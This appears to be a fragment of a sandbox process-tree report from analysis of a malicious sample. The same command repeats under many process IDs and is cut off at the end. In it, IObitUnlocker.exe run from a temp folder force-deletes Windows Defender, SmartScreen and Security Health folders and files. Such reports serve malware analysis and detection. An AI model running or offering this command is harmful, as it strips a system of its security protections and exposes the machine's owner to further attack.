                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8448
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9436
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 